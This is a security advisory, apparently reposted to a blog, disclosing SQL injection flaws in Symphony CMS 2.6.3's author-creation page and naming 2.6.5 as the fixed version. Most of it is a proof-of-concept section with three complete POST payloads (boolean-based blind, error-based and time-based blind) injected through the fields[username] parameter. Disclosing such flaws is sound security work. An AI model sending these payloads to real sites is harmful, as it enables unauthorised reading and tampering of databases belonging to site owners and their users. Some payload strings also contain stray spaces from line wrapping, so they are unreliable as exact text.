================================================================ Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities ================================================================ Information ================================================================ Vulnerability Type : Multiple SQL Injection Vulnerabilities Vendor Homepage: http://ift.tt/1bgFZfB Vulnerable Version:Symphony CMS 2.6.3 Fixed Version :Symphony CMS 2.6.5 Severity: High Author – Sachin Wagh (@tiger_tigerboy) Description ================================================================ The vulnerability is located in the 'fields[username]','action[save]' and 'fields[email]' of the '/symphony/system/authors/new/' page. Proof of Concept ================================================================ *1. fields[username] (POST)* Parameter: fields[username] (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697' OR 7462=7462#&fields[user_type]=author&fields[password]=sach in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1 004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a rea]=3&action[save]=Create Author Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123' OR SLEEP(5)#&fields[user_type]=author&fields[password]=s achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment